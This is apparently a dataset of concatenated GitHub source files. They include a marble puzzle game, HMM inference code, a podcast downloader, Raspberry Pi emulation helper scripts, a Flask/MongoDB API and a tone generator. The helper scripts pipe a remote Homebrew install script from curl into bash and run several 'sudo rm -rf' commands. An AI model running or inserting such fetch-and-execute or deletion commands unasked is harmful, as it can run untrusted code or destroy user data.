(ex. filename = 'Boston_terrier_02259.jpg' Pet label = 'boston terrier')
Parameters:
image_dir - The (full) path to the folder of images that are to be
classified by the classifier function (string)
Returns:
results_dic - Dictionary with 'key' as image filename and 'value' as a
List. The list contains for following item:
index 0 = pet image label (string)
"""
# Replace None with the results_dic dictionary that you created with this
# function
# Imports only listdir function from OS module
# Retrieve the filenames from folder pet_images/
results_dic = {}
filename_list = listdir(image_dir)
for name in filename_list:
results_dic[name] = results_dic.get(name, create_label_from_filename(name))
return results_dic
def create_label_from_filename(filename):
"""
Takes a filename and turns it into a list with a single lowercase string
containing the pet label that is in the filename
(ex. filename = 'Boston_terrier_02259.jpg' Pet label = 'boston terrier')
Parameters:
filename - The filename (string)
Returns:
List with filename turned into lowercase string stripped of numbers and
extensions (e.g. 'Boston_terrier_02259.jpg' => ['boston terrier'])
"""
name_list = filename.split("_")[:-1]
for idx in range(0, len(name_list)):
name_list[idx] = name_list[idx].lower()
return [" ".join(name_list)]
```
|
{
"source": "JessSantos/Marble-Ordering-Game",
"score": 4
}
|
#### File: JessSantos/Marble-Ordering-Game/CelticaJM.py
```python
from graphics import *
import random
## to jump to display/gui-related functions and settings, search "GUI settings"
## to jump to game-related and background functions, search "mechanics"
## to jump to main() function, search "main()"
### ~~ GUI settings ~~ ###
# I made it playable for every size board, though it might look prettier at some settings, like 500 or 600
# this value can be changed to adjust board size; maybe in the finished game it could ask for input for board size
width = height = w = 600 # "w" for width; height and width should always be equal for this game
# Purpose: dictionary of ratio-points where the balls should arrange themselves around heboard
# Syntax: Circle(Point(pointdict()[iterationitem][1]), Point(pointdict()[iterationitem][2])))
# Parameters: none
# Return value: pointdict: a dictionary mapping locations to location on the board
def pointdict():
d = (1/10)*w # "d" for distance from sides of game board
# board setup; these are the loactions of all the balls
pointdict = {0:[(6/10)*w, d],
1:[(7/10)*w, d],
2:[(8/10)*w, d],
3:[w-d, d],
4:[w-d, (2/10)*w],
5:[w-d, (3/10)*w],
6:[w-d, (4/10)*w],
7:[w-d, (5/10)*w],
8:[w-d, (6/10)*w],
9:[w-d, (7/10)*w],
10:[w-d, (8/10)*w],
11:[w-d, w-d],
12:[(8/10)*w, w-d],
13:[(7/10)*w, w-d],
14:[(6/10)*w, w-d],
15:[(5/10)*w, w-d],
16:[(4/10)*w, w-d],
17:[(3/10)*w, w-d],
18:[(2/10)*w, w-d],
19:[d, w-d],
20:[d, (8/10)*w],
21:[d, (7/10)*w],
22:[d, (6/10)*w],
23:[d, (5/10)*w],
24:[d, (4/10)*w],
25:[d, (3/10)*w],
26:[d, (2/10)*w],
27:[d , d],
28:[(2/10)*w, d],
29:[(3/10)*w, d],
30:[(4/10)*w, d],
31:[(5/10)*w, d],
32:[w/2, w/2]}
return pointdict
# Purpose: helper function to draw the background rectangles that are darker versions of the colors they house
# Syntax: draw_rectangle(width/4, width/4, "purple", window)
# Parameters: x: the x-coordinate of the anchor point
# y: the y-coordinate of the anchor point
# color: the color of the box
# win: the window to draw it in
# Return value: none
def draw_rectangle(x, y, color, win): # draws the rectangles that make up the background croos
rect = Rectangle(Point(x-(width/4-25), y-(height/4-25)), Point(x+(width/4-25), y+(height/4-25)))
rect.setFill(color)
rect.draw(win)
# Purpose: helper function to draw the circles that make up the marbles of Celtica
# Syntax: draw_circle(Point(width/5, width/5), "blue", window)
# Parameters: point: the anchor point of the circle to be drawn
# color: the color of the inside of the circle
# win: the window in wich to draw the circle
# Return value: none
def draw_circle(point, color, win):
circ = Circle(Point(pointdict()[point][0], pointdict()[point][1]), 20)
circ.setOutline("white")
circ.setWidth(1)
circ.setFill(color)
circ.draw(win)
# Purpose: helper function to draw the marbles of the board consistently
# Syntax: draw_board(list_representing_the_board, window)
# Parameters: board: a list in the format ["G", "G", "B", ...], the same length and contents as setup_game(), though not necessarily the same order
# win: the window in which to draw the board
# Return value: none
def draw_board(board, win):
for numitem in range(33): # give each letter the appropriate colour
if board[numitem] == "G":
color = color_rgb(0, 250, 0)
if board[numitem] == "Y":
color = color_rgb(254, 250, 6)
if board[numitem] == "R":
color = color_rgb(255, 39, 0)
if board[numitem] == "B":
color = color_rgb(0, 251, 255)
if board[numitem] == "X":
color = "black"
draw_circle(numitem, color, win)
# Purpose: helper function to draw the background in one, consistent, swoop
# Syntax: make_background(window)
# Parameters: window: the window in which you want the background drawn
# Return value: none
def make_background(win): # makes the background that looks like a celtic cross
win.setBackground(color_rgb(1, 25, 148)) # make the background blue
yellow = color_rgb(146, 144, 0) # define dark colours of squares
aqua = color_rgb(0, 145, 147)
red = color_rgb(148, 17, 0)
green = color_rgb(0, 142, 0)
draw_rectangle(w/4, w/4, aqua, win) # draw squares
draw_rectangle((3/4)*w, w/4, green, win)
draw_rectangle(w/4, (3/4)*w, yellow, win)
draw_rectangle((3/4)*w, (3/4)*w, red, win)
# Purpose: to draw the text that is always present on the Celtica board
# Syntax: draw_board_text(window)
# Parameters: win: the window in which to draw the writing
# Return value: none
def draw_board_text(win):
celtica = Text(Point(w/2, w/4), "Celtica") # begin dawing text for "Celtica"
celtica.setSize(25)
celtica.setTextColor("white")
celtica.draw(win)
brb = Text(Point(w/2, (w/4)+25), "by BRB") # begin drawing text for "by BRB"
brb.setStyle("bold")
brb.setTextColor("white")
brb.draw(win)
### ~~ mechanics ~~ ###
# Purpose: helper function to setup_game() that appends something to a list 8 times
# Syntax: append_8(item, alist)
# Parameters: item - an item that you want to append to a list; list - the list you wish to append to
# Return value: none
def append_8(item, alist):
counter = 0
while counter < 8:
alist.append(item)
counter = counter + 1
# Purpose: to generate a list of balls, in order, for a game of celtica
# Syntax: board = setup_game()
# Parameters: none
# Return value: board - a list of characters representing the celtica game board; ['G', 'G', 'G', 'G', 'G', ... ]
def setup_game():
board = []
append_8("G", board)
append_8("R", board)
append_8("Y", board)
append_8("B", board)
board.append("X")
return board # this board should be in the winning configuration
# Purpose: to swap two values in the game board
# Syntax: exchange(board, 1, 7)
# Parameters: board - a list of characters representing the celtica game board, ['G', 'G', 'G', 'G', 'G', ... ], two numbers that are indices in the list board
# Return value: none
def exchange(board, first, second):
board[first], board[second] = board[second], board[first]
# Purpose: to see if the game is over
# Syntax: is_over = is_game_over(board)
# Parameters: board - a list of characters representing the celtica game board, ['G', 'G', 'G', 'G', 'G', ... ]
# Return value: True, if winning configuration; False otherwise
def is_game_over(board):
if board == setup_game():
return True
else:
return False
# Purpose: helper function to create a shuffled board, because I apparently hadn't done this before
# Syntax: board_to_start_playing_with = make_random_board(setup_game)
# Parameters: none
# Return value: shuffled version of winboard from setup_game(), list
def make_random_board():
newboard = setup_game()[:]
for i in range(25000):
possibletrade = random.randint(0, len(newboard)-1) # choose a random index in newboard
if is_neighbour(whereisX(newboard), possibletrade) == True:
exchange(newboard, whereisX(newboard), possibletrade) # if the random index is a legal move, then switch it
else:
continue
return newboard
# Purpose: handy helper function to quickly find X in a board
# Syntax: exchange(whereisX(board), 32)
# Parameters: board: the board you want to find X's location in
# Return value: the index of where X is in board
def whereisX(board):
return board.index("X")
# Purpose: helper function, returns true if the marble in question can be legally traded with another marble
# Syntax: if is_neighbour(whereisX(board), board[20]) == True: ...
# Parameters: whereXis: can actually be any location on the board, but it's most useful to do it for X
# newspot: another location on the board to test for validity
# Return value: bool: True or False
def is_neighbour(whereXis, newspot):
# neigbourdict is a dictionary of all the possible places a marble can move
neighbourdict = {0:(31, 1), 1:(0, 2), 2:(1, 3), 3:(2, 4), 4:(3, 5), 5:(4, 6),
6:(5, 7), 7:(6, 32, 8), 8:(7, 9), 9:(8, 10), 10:(9, 11),
11:(10, 12), 12:(11, 13), 13:(12, 14), 14:(13, 15), 15:(14, 32, 16),
16:(15, 14), 17:(16, 18), 18:(17, 19), 19:(18, 20), 20:(19, 21),
21:(20, 22), 22:(21, 23), 23:(22, 32, 24), 24:(23, 25), 25:(24, 26),
26:(25, 27), 27:(26, 28), 28:(27, 29), 29:(28, 30), 30:(29, 31),
31:(30, 32, 0), 32:(31, 7, 23, 15)}
if newspot in neighbourdict[whereXis]: # returns True if neighbour, False if not
return True
else:
return False
# Purpose: determines if a move is legal
# Syntax: if is_legal_move(board, 20): ...
# Parameters: board: the board with which you're working
# index: the index you might want to switch to
# Return value: bool: True or False
def is_legal_move(board, index):
whereXis = board.index("X")
return is_neighbour(whereXis, index)
# Purpose: Check if a point is within the bounding box of button
# Syntax: bool = is_clicked(point, button)
# Parameters: point - Point object
# button - Rectangle object
# Return value: True if point is within the bounding box of button;
# False, otherwise
def is_clicked(point, button):
top_left = button.getP1()
bottom_right = button.getP2() # useable as is because graphics.py has a square object for every circle object
return (point.x >= top_left.x and point.x <= bottom_right.x and
point.y >= top_left.y and point.y <= bottom_right.y)
### ~~ main ~~ ###
# Purpose: runs the completed game
# Syntax: main()
# Parameters: none
# Return value: none
def main():
win = GraphWin("Celtica", width, height) # make a window
make_background(win) # set up background, text, and scrambled board
draw_board_text(win)
board = make_random_board()
draw_board(board, win) # draw the board
if is_game_over(board) == True: # if board is in winning configuration...
winner = Text(Point(w/2, (2/3)*w), "You win!") # begin drawing text for "You win!"
winner.setSize(25)
winner.setTextColor("white")
winner.draw(win)
while True:
try: # .checkMouse() may fail if the window was closed; prevent
point = win.checkMouse() # Python from crashing by placing it within a try/except block;
except GraphicsError: # given the error, the function can return (instead of crashing)
return
if point == None: # if no mouse click, starts while loop all over (this try/except was copied from lab 6)
continue
for keyvalue in pointdict().items(): # where marbles get exchanged
index, centerpoint = keyvalue # unpack the tuple so both keys and values are useable
if is_clicked(point, Circle(Point(centerpoint[0], centerpoint[1]), 20)):
if is_legal_move(board, index):
exchange(board, whereisX(board), index) # if it's a legal move, exchange marbles
draw_board(board, win) # once exchanged, redraw
close()
main()
```
|
{
"source": "jessstringham/notebooks",
"score": 3
}
|
#### File: notebooks/nb_code/hmm_alpha_recursion.py
```python
width = 6
height = 5
num_hidden_states = width * height
# prob of starting starting locations
p_hidden_start = np.ones(num_hidden_states) / num_hidden_states
# verify it's a valid probability distribution
assert np.all(np.isclose(np.sum(p_hidden_start), 1))
assert np.all(p_hidden_start >= 0)
def create_transition_joint(width, height):
num_hidden_states = width * height
# begin by building an unnormalized matrix with 1s for all legal moves.
unnormalized_transition_joint = np.zeros((num_hidden_states, num_hidden_states))
# This will help me map from height and width to the state
map_x_y_to_hidden_state_id = np.arange(num_hidden_states).reshape(height, width).T
for x in range(width):
for y in range(height):
h_t = map_x_y_to_hidden_state_id[x, y]
# hax to go through each possible direction
for d in range(4):
new_x = x
new_y = y
if d // 2 == 0:
# move left or right!
new_x = x + ((d % 2) * 2 - 1)
else:
# move up or down!
new_y = y + ((d % 2) * 2 - 1)
# make sure they don't walk through walls
if any((
new_x > width - 1,
new_x < 0,
new_y > height - 1,
new_y < 0
)):
continue
h_t_minus_1 = map_x_y_to_hidden_state_id[new_x, new_y]
unnormalized_transition_joint[h_t_minus_1][h_t] = 1
# normalize!
p_transition_joint = unnormalized_transition_joint / np.sum(unnormalized_transition_joint)
# make sure this is a joint probability
assert np.isclose(np.sum(p_transition_joint), 1)
# not super necessary, but eh
assert np.all(p_transition_joint >= 0)
return p_transition_joint
def create_transition(width, height):
p_transition_joint = create_transition_joint(width, height)
num_hidden_states = width * height
p_transition = np.zeros((num_hidden_states, num_hidden_states))
for old_state in range(num_hidden_states):
p_transition[:, old_state] = p_transition_joint[:, old_state] / np.sum(p_transition_joint[:, old_state])
# verify it's a conditional distribution
assert np.all(np.sum(p_transition, axis=0)) == 1
return p_transition
p_transition = create_transition(width, height)
def plot_state_in_room(state_id, width=width, height=height):
h = np.zeros(width * height)
h[state_id] = 1
return h.reshape(height, width)
def make_sound_map():
NUM_SOUNDS = 10
LOW_PROB = 0.1
HIGH_PROB = 0.9
# everything has at least LOW_PROB of triggering the sound
grid = LOW_PROB * np.ones(num_hidden_states)
# select NUM_BUMP_CREAKS to make HIGH_PROB
locs = np.random.choice(
num_hidden_states,
size=NUM_SOUNDS,
replace=False
)
grid[locs] = HIGH_PROB
return grid
prob_bump_true_given_location = make_sound_map()
prob_creak_true_given_location = make_sound_map()
num_visible_states = 4
def get_emission_matrix(prob_bump_true_given_location, prob_creak_true_given_location):
# prob_bump_given_state[v][state] = p(v | state)
p_emission = np.vstack((
prob_bump_true_given_location * prob_creak_true_given_location,
prob_bump_true_given_location * (1 - prob_creak_true_given_location),
(1 - prob_bump_true_given_location) * prob_creak_true_given_location,
(1 - prob_bump_true_given_location) * (1 - prob_creak_true_given_location),
))
assert np.all(np.sum(p_emission, axis=0)) == 1
return p_emission
p_emission = get_emission_matrix(prob_bump_true_given_location, prob_creak_true_given_location)
# 1 means True. ex: [1, 0] means bump=True, creak=False
map_visible_state_to_bump_creak = np.vstack((
[1, 1],
[1, 0],
[0, 1],
[0, 0],
))
timesteps = 10
hiddens = np.zeros(timesteps, dtype=int)
visibles = np.zeros(timesteps, dtype=int)
hiddens[0] = np.random.choice(num_hidden_states, p=p_hidden_start)
visibles[0] = np.random.choice(
num_visible_states,
p=p_emission[:, hiddens[0]]
)
for t in range(1, timesteps):
hiddens[t] = np.random.choice(
num_hidden_states,
p=p_transition[:, hiddens[t - 1]]
)
visibles[t] = np.random.choice(
num_visible_states,
p=p_emission[:, hiddens[t]]
)
def alpha_recursion(visibles, p_hidden_start, p_transition, p_emission):
num_timestamps = visibles.shape[0]
num_hidden_states = p_transition.shape[0]
# There will be one alpha for each timestamp
alphas = np.zeros((num_timestamps, num_hidden_states))
# alpha(h_1) = p(h_1) * p(v_1 | h_1)
alphas[0] = p_hidden_start * p_emission[visibles[0]]
# normalize to avoid overflow
alphas[0] /= np.sum(alphas[0])
for t in range(1, num_timestamps):
# p(v_s | h_s)
# size: new_states
corrector = p_emission[visibles[t]]
# sum over all hidden states for the previous timestep and multiply the
# transition prob by the previous alpha
# transition_matrix size: new_state x old_state
# alphas[t_minus_1].T size: old_state x 1
# predictor size: new_state x 1,
predictor = p_transition @ alphas[t - 1, None].T
# alpha(h_s)
alphas[t, :] = corrector * predictor[:, 0]
# normalize
alphas[t] /= np.sum(alphas[t])
return alphas
alphas = alpha_recursion(
visibles,
p_hidden_start,
p_transition,
p_emission,
)
assert np.all(np.isclose(np.sum(alphas, axis=1), 1))
```
|
{
"source": "jessstringham/podcasts",
"score": 3
}
|
#### File: podcasts/podcast/download.py
```python
import typing
import urllib.error
import urllib.request
from podcast.files import download_location
from podcast.info import build_info_content
from podcast.info import InfoContent
from podcast.models import Channel
from podcast.models import get_podcast_audio_link
from podcast.models import NewStatus
from podcast.models import Podcast
from podcast.models import Radio
from podcast.models import RadioDirectory
def _download_from_url(url: str, location: str) -> bool:
try:
urllib.request.urlretrieve(url, location)
return True
except (IOError, urllib.error.ContentTooShortError):
# If a connection can't be made, IOError is raised
# If the download gets interrupted (ContentTooShortError), we
# should try again later
# TODO: can we tell if it was a bad filename (and should stop
# requesting it), or internet connectivity (and should tell
# us), or just a fluke (and should retry)?
return False
def download_podcast(
directory: RadioDirectory,
channel: Channel,
podcast: Podcast) -> Podcast:
location = download_location(directory, channel, podcast)
url = get_podcast_audio_link(podcast)
# TODO: This takes some time, especially when there are a lot to
# download. I could have this spawn threads, or add priorities,
# and so on. For now, since it runs every few hours, and is more
# of a push than a pull situation for the user, I'm leaving it
# simple
success = _download_from_url(url, location)
if success:
return podcast._replace(status=NewStatus())
else:
return podcast
def download_channel(directory: RadioDirectory, channel: Channel) -> Channel:
updated_podcasts = []
for known_podcast in channel.known_podcasts:
if type(known_podcast.status).__name__ == 'RequestedStatus':
known_podcast = download_podcast(directory, channel, known_podcast)
updated_podcasts.append(known_podcast)
return channel._replace(known_podcasts=updated_podcasts)
def download_radio(radio: Radio) -> typing.Tuple[Radio, InfoContent]:
downloaded_channels = [
download_channel(radio.directory, channel)
for channel in radio.channels
]
radio = radio._replace(channels=downloaded_channels)
info_content = build_info_content()
return (radio, info_content)
```
#### File: podcasts/podcast/models.py
```python
import typing
from collections import namedtuple
from urllib.parse import urlparse
PodcastData = typing.NamedTuple('PodcastData', [
('title', str), # title
('subtitle', str), # subtitle
('published', float), # time published
# string of the audio url, or None if we couldn't find one
('audio_link', typing.Dict[str, str]),
])
# Podcast states
UnmergedStatus = typing.NamedTuple('UnmergedStatus', [])
RequestedStatus = typing.NamedTuple('RequestedStatus', [])
CancelledStatus = typing.NamedTuple('CancelledStatus', [])
NewStatus = typing.NamedTuple('NewStatus', [])
StartedStatus = typing.NamedTuple('StartedStatus', [])
FinishedStatus = typing.NamedTuple('FinishedStatus', [])
DeletedStatus = typing.NamedTuple('DeletedStatus', [])
Podcast = typing.NamedTuple('Podcast', [
('data', PodcastData),
('status', typing.Union[
UnmergedStatus,
RequestedStatus,
CancelledStatus,
NewStatus,
StartedStatus,
FinishedStatus,
DeletedStatus,
])])
def get_podcast_audio_link(podcast: Podcast) -> str:
return podcast.data.audio_link['href']
def get_podcast_url(podcast: Podcast) -> str:
return urlparse(get_podcast_audio_link(podcast)).path.split('/')[-1]
# NOTE: This seems like something I'll probably regret
def get_podcast_id(podcast: Podcast) -> str:
return '.'.join(get_podcast_url(podcast).split('.')[:-1])
ChannelInfo = namedtuple('ChannelInfo', 'name url directory')
Channel = typing.NamedTuple('Channel', [
('channel_info', ChannelInfo),
('known_podcasts', typing.List[Podcast])])
def get_channel_id(channel: Channel) -> str:
return channel.channel_info.directory
def map_channel_podcasts(
channel: Channel,
map_f: typing.Callable[[Channel, Podcast], Podcast],
) -> Channel:
return channel._replace(
known_podcasts=[
map_f(channel, podcast)
for podcast in channel.known_podcasts])
RadioDirectory = typing.NewType('RadioDirectory', str)
Radio = typing.NamedTuple('Radio', [
('channels', typing.List[Channel]),
('directory', RadioDirectory)])
def map_radio_channels(
radio: Radio,
map_f: typing.Callable[[Channel], Channel],
) -> Radio:
return radio._replace(
channels=[
map_f(channel)
for channel in radio.channels])
def read_channel_from_id(
radio: Radio,
channel_id: str
) -> typing.Optional[Channel]:
for channel in radio.channels:
if get_channel_id(channel) == channel_id:
return channel
```
|
{
"source": "Jesssullivan/clipi",
"score": 2
}
|
#### File: Jesssullivan/clipi/alias.py
```python
from common import *
"""
alias.py:
copy / update files at ~/.clipi to be accessed via alias.
add clipi to shell's rc file.
"""
class alias(object):
@classmethod
def add_to_bash(cls):
print('adding alias....')
clipi_line = "\\'~/.clipi/clipi.py\\'"
if platform == "linux" or platform == "linux2":
print("environment: detected Linux, continuing...")
cmd = "echo alias clipi=" + clipi_line + " >> ~/.bashrc "
subprocess.Popen(cmd, shell=True).wait()
if platform == 'darwin':
print("environment: detected Mac OSX, continuing...")
if os.path.exists('~/zshrc'):
cmd = "echo alias clipi=" + clipi_line + " >> ~/.zshrc "
subprocess.Popen(cmd, shell=True).wait()
if os.path.exists('~/bashrc'):
cmd = "echo alias clipi=" + clipi_line + " >> ~/.bashrc "
subprocess.Popen(cmd, shell=True).wait()
if os.path.exists('~/bash_profile'):
cmd = "echo alias clipi=" + clipi_line + " >> ~/.bash_profile "
subprocess.Popen(cmd, shell=True).wait()
@classmethod
def bash_alias_update(cls):
# adds .directory for bash version, separate from git:
try:
subprocess.Popen("sudo rm -rf ~/.clipi", shell=True).wait()
except:
pass
try:
subprocess.Popen("sudo mkdir ~/.clipi", shell=True).wait()
except:
pass
try:
subprocess.Popen("sudo cp -rf ../clipi/* ~/.clipi/", shell=True).wait()
except:
pass
try:
subprocess.Popen("rm -rf ~/.clipi/.git", shell=True).wait()
except:
pass
try:
subprocess.Popen("sudo chmod 775 ~/.clipi/*", shell=True).wait()
except:
pass
@classmethod
def do_alias(cls):
cls.add_to_bash()
cls.bash_alias_update()
```
#### File: Jesssullivan/clipi/common.py
```python
import os
import subprocess
import sys
from random import random
from sys import platform
from time import sleep
from zipfile import ZipFile
import requests
from shutil import which
import xmltodict
class common(object):
bin_url = "http://clipi-bins.s3.amazonaws.com/"
@staticmethod
def is_installed(cmd):
print('checking if ' + cmd + ' is present...')
if not which(cmd):
print("didn't find " + cmd)
return False
else:
return True
@classmethod
def dep_install(cls, dep, brew_dep=None):
if platform == "linux" or platform == "linux2":
print("environment: detected Linux, continuing with apt-get....")
subprocess.Popen('sudo apt-get install ' + dep + ' -y', shell=True).wait()
# todo: maybe prompt for other package manager options
if brew_dep is None:
brew_dep = dep
elif platform == 'darwin':
print("environment: detected osx, not completely tested yet, YMMV")
if cls.is_installed('brew'):
print('attempting brew install of ' + brew_dep + '...... \n')
subprocess.Popen('brew install' + brew_dep, shell=True).wait()
else:
print("brew package manager not detected, attempting to install brew now...")
brew_string = str(
'/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)')
subprocess.Popen(brew_string,
shell=True).wait()
@staticmethod
def ensure_dir(dirname='image'):
if not os.path.isdir(dirname):
os.mkdir(dirname)
@classmethod
def ensure_bins(cls):
if not os.path.isdir('bin'):
print('adding /bin....')
os.mkdir('bin')
sleep(.2)
print('fetching binary list from S3....')
index = requests.get(cls.bin_url).content
with open('bin/index.xml', 'wb') as f:
f.write(index)
sleep(.2)
print('parsing response....')
with open('bin/index.xml') as fd:
doc = xmltodict.parse(fd.read())
sleep(.2)
print('downloading....')
Keys = doc['ListBucketResult']['Contents']
for f in Keys:
item = f['Key']
cmd = str("wget -O bin/" + item + " " + cls.bin_url + item)
subprocess.Popen(cmd, shell=True).wait()
sleep(.2)
print('done.')
@classmethod
def main_install(cls):
if not cls.is_installed(cmd='wget'):
cls.dep_install(dep='wget')
if not cls.is_installed(cmd='qemu-system-arm'):
cls.dep_install(dep='qemu-system-arm')
if not cls.is_installed(cmd='qemu-system-aarch64'):
cls.dep_install(dep='qemu-system-aarch64')
if not cls.is_installed(cmd='dd'):
cls.dep_install(dep='dd')
if not cls.is_installed(cmd='nmap'):
cls.dep_install(dep='nmap')
if not cls.is_installed(cmd='p7zip'):
cls.dep_install(dep='p7zip')
# if not cls.is_installed(cmd='texinfo'):
# cls.dep_install(dep='texinfo')
# if not cls.is_installed(cmd='qemu-system-aarch64'):
# cls.dep_install(dep='qemu-system-aarch64')
@classmethod
def unzip(cls, input, output):
if input.split('.')[-1] == 'zip':
with ZipFile(input, 'r') as zip_ref:
zip_ref.extractall(output)
sleep(.1)
return 0
elif input.split('.')[-1] == '7z':
if not cls.is_installed(cmd='p7zip'):
print('installing p7zip to extract this image...')
cls.dep_install(dep='p7zip')
cls.dep_install(dep='p7zip-full')
sleep(.1)
print('attempting to extract image from 7z...')
cmd = str('7z e ' + input + ' -o' + output + ' -aoa')
subprocess.Popen(cmd, shell=True).wait()
sleep(.1)
return 0
elif 'gz' in input:
print('attempting to extract image from .gz...')
cmd = str('gunzip ' + input)
subprocess.Popen(cmd, shell=True).wait()
sleep(.1)
return 0
elif 'xz' in input:
print('attempting to extract image from .xz...')
cmd = str('unxz ' + input)
subprocess.Popen(cmd, shell=True).wait()
sleep(.1)
return 0
@staticmethod
def restart(execute=None):
clipi_path = os.path.abspath(__file__).split('<')[0]
print('...\n')
sleep(.1)
print('...\n')
sys.stdout.flush()
if execute is None:
cmd = 'python3 ' + clipi_path + 'clipi.py '
else:
cmd = 'python3 ' + clipi_path + 'clipi.py ' + str(execute)
print(cmd)
proc = subprocess.Popen(cmd, shell=True)
print('re-executed clipi! ' +
'\n - @ pid ' + str(proc.pid))
@classmethod
def cleanup(cls):
# removes as admin from shell to avoid a wonky super python user xD
subprocess.Popen('sudo rm -rf image .pi', shell=True).wait()
print()
for x in range(3):
print('...\n')
sleep(.1)
print('complete. \n\n')
"""
Network & bridging functions have not been implemented yet
"""
@staticmethod
def get_network_depends():
if platform == 'darwin':
print('cannot install network bridge depends on mac OSX')
return 0
else:
print('make sure /network is ready to install....')
subprocess.Popen('sudo chmod u+x network/apt_net_depends.sh', shell=True).wait()
print('installing.....')
subprocess.Popen('./network/apt_net_depends.sh', shell=True).wait()
sleep(.1)
print('done.')
@staticmethod
def new_mac():
oui_bits = [0x52, 0x54, 0x00]
for x in range(256):
mac = oui_bits + [
random.randint(0x00, 0xff),
random.randint(0x00, 0xff),
random.randint(0x00, 0xff)]
return ':'.join(["%02x" % x for x in mac])
@staticmethod
def check_bridge():
CLIPINET = "read CLIPINET <<< $(ip -o link | awk '$2 != " + '"lo:"' + " {print $2}')"
if platform == 'darwin':
print('bridge networking not available for mac OSX')
quit()
else:
print('checking bridge network.....')
subprocess.Popen(CLIPINET, shell=True).wait()
subprocess.Popen('sudo chmod u+x network/up_bridge.sh', shell=True).wait()
sleep(.1)
subprocess.Popen('sudo ./network/up_bridge.sh', shell=True)
sleep(.1)
```
#### File: Jesssullivan/clipi/sources.py
```python
from common import *
import toml
import yaml
class sources(object):
default_configs = ['sources', 'etc/sources']
default_settings = ['default', 'etc/default']
default_types = ['.toml', '.yaml']
# provides an option to provide etc/sources.toml or add directly to dictionary
@classmethod
def get_source(cls):
for econfig in cls.default_configs:
for etype in cls.default_types:
try:
if os.path.isfile(econfig + etype):
if 'toml' in etype:
source = toml.load(econfig + etype)
else:
source = yaml.load(open(econfig + etype), Loader=yaml.Loader)
return source
except:
pass
else:
print("couldn't find default source toml or yaml, FYI")
# catch all if sources.toml doesn't exist:
source = {
'stretch_lite': 'http://downloads.raspberrypi.org/raspbian_lite/images/raspbian_lite-2018-11-15/2018-11-13'
'-raspbian-stretch-lite.zip',
'stretch_desktop': 'http://downloads.raspberrypi.org/raspbian/images/raspbian-2019-04-09/2019-04-08-raspbian'
'-stretch.zip',
'octoprint': 'https://octopi.octoprint.org/latest',
}
return source
@staticmethod
def has_conf():
# soften argument / no argument
try:
if '.toml' in sys.argv[1]:
return True
if '.yaml' in sys.argv[1]:
return True
except:
return False
@classmethod
def load_args(cls):
if sources.has_conf():
source = toml.load(sys.argv[1])
return source
else:
for econfig in cls.default_settings:
for etype in cls.default_types:
try:
if os.path.isfile(econfig + etype):
if 'toml' in etype:
source = toml.load(econfig + etype)
else:
source = yaml.load(open(econfig + etype), Loader=yaml.Loader)
return source
except:
pass
@staticmethod
def do_arg(arg, default):
xargs = sources.load_args()
try:
k = xargs[arg]
return k
except:
return default
```
|
{
"source": "Jesssullivan/MerlinAI-Interpreters",
"score": 3
}
|
#### File: main/datadb/models.py
```python
from flask import current_app as app
from ..tools import tools
from datetime import datetime
from flask import Flask, request, json, Response
from pymongo import MongoClient
import json
class DataAPI:
def __init__(self, data):
self.client = MongoClient("mongodb://127.0.0.1:27017/")
database = data['***']
collection = data['**']
cursor = self.client[database]
self.collection = cursor[collection]
self.data = data
def read(self):
print('Reading Data')
documents = self.collection.find()
output = [{item: data[item] for item in data if item != '_id'} for data in documents]
return output
def write(self):
print('Writing Data')
# load request:
_request = request.json
print(_request)
self.collection.insert(_request)
return tools.JsonResp(_request, 200)
def update(self):
print('Updating Data')
filt = self.data['Filter']
updated_data = {"$set": self.data['DataToBeUpdated']}
response = self.collection.update_one(filt, updated_data)
output = {'Status': 'Successfully Updated' if response.modified_count > 0 else "Nothing was updated."}
return output
def delete(self, data):
print('Deleting Data')
filt = data['Document']
response = self.collection.delete_one(filt)
output = {'Status': 'Successfully Deleted' if response.deleted_count > 0 else "Document not found."}
return output
class Asset:
def __init__(self):
self.defaults = {
"url": "",
"audio": "",
"src": "",
"attribution": ""
}
@staticmethod
def add_id_event():
_add_json = []
# load request:
_request = request.json
# insert event:
_ = app.db.eventdb.insert(_request)
return tools.JsonResp(_add_json, 200)
@staticmethod
def delete_id_event():
_del_json = {}
# load request:
_request = request.json
for id_event in _request:
_del_json.update(id_event)
# delete events:
_ = app.db.eventdb.delete_many(_del_json)
return tools.JsonResp(_del_json, 200)
@staticmethod
def list():
_raw_data = app.db.eventdb.find()
_docs = list(_raw_data)
return json.dumps(_docs)
@staticmethod
def add_dummy():
_event = {
"id": tools.randID(),
"ML_id": tools.randStringNumbersOnly(8),
"username": tools.randUser(),
"media_source": 'https://example.com/wavfile.wav',
"bbox": tools.randBbox(),
"category": tools.randSpecies(),
"supercategory": "Bird",
"last_modified": datetime.today().isoformat()
}
_data = app.db.eventdb.insert(_event)
return tools.JsonResp(_data, 200)
@staticmethod
def query_events_dummy(req):
_request = req.form
# get key & value for query:
_key = _request['key']
_value = _request['value']
# query:
_output = app.db.eventdb.find({_key: _value})
_docs = list(_output)
return tools.JsonResp(_docs, 200)
```
#### File: interpreter/etc/tone.py
```python
import numpy as np
from scipy.io.wavfile import write
from sys import argv
from os.path import abspath
# Generate .wav file from the command line
#
# testing out the accuracy of fft in Swift
#
# @ github.com/Jesssullivan/tmpUI
default_msg = str("no args specified, using defaults \n " +
" - you can specify duration in seconds & frequency in Hz like so: \n " +
" ` python3 tone.py 5 440 ` ")
def generate_sine_wav(frequency=440, length=5):
# stick with 44100 as sample rate:
_sample_rate = 44100
# parse any arguments passed from the shell:
try:
num_args = len(argv)
if num_args == 1:
length = int(argv[1])
print(length)
elif num_args > 1:
length = int(argv[1])
frequency = int(argv[2])
print(argv[2])
# no args, use defaults:
except:
print(default_msg)
# give the wav file a name:
file_name = "tone_" + str(length) + "_" + str(frequency) + ".wav"
print("...Creating file `" + file_name + "` ")
# generate a file:
file = np.linspace(0, length, _sample_rate * length)
# set frequency in Hz:
output_array = np.sin(frequency * 2 * np.pi * file)
# write out the .wav file:
write(file_name, _sample_rate, output_array)
# tell everyone about it:
print("...Generated file: \n " +
str(abspath(file_name)) +
"\n:)")
if __name__ == "__main__":
try:
generate_sine_wav()
except KeyboardInterrupt:
print("...Create .wav file aborted.")
quit()
```
|
{
"source": "JessterB/agora-data-tools",
"score": 3
}
|
#### File: agora-data-tools/tests/test_utils.py
```python
import pytest
from agoradatatools.etl import utils
from synapseclient import Synapse
file_object = {
"id": "syn25838546",
"format": "table",
"final_filename": "teams",
"provenance": [],
